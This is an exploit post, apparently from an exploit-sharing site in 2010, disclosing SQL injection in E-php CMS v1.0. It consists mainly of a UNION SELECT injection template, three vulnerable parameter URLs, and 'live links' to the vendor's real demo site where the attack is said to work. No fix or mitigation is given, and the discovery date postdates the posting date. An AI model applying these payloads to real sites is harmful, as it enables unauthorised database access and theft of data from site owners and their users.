E-php CMS v1.0 SQL Injection Vulnerability
Posted on 21 March 2010
========================================== E-php CMS v1.0 SQL Injection Vulnerability ========================================== ----- [Title] ----- E-php CMS SQL Injection Vulnerability ----- [ Vendor ] ----- http://www.ephpscripts.com/content-management-system.php %\ ############################################################################## ############################################################################## %// ----- [ Exploit (s) ] ----- Put [CODE] = SQL Injection Code {e.g = article.php?es_id=11+and+1=0+ Union Select 1 , UNHEX(HEX([visible])) ,3,4,5,6,7,8,9,10,11,12 (tables & column) } [SQLi] http://server/e-php/article.php?es_id=11[CODE] [SQLi] http://server/e-php/browsecats.php?cid=6[CODE] [SQLi] http://server/e-php/event_desc.php?es_id=4[CODE] %\ ############################################################################## ############################################################################## %// >>>>>> TESTED ON <<<<<< ----- [ Live Link (s) ] ----- [Link] http://www.ephpscripts.com/demo/cms/article.php?es_id=11[CODE] [Link] http://www.ephpscripts.com/demo/cms/event_desc.php?es_id=4[CODE] [Link] http://www.ephpscripts.com/demo/cms/browsecats.php?cid=14[CODE] %\ ############################################################################## -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Thanks To All: I.C.W + W.O.I + H.M.G + C.I.A + AH Members -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Bug discovered : 22 March 2010 finish(0); -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Inj3ct0r.com [2010-03-21]
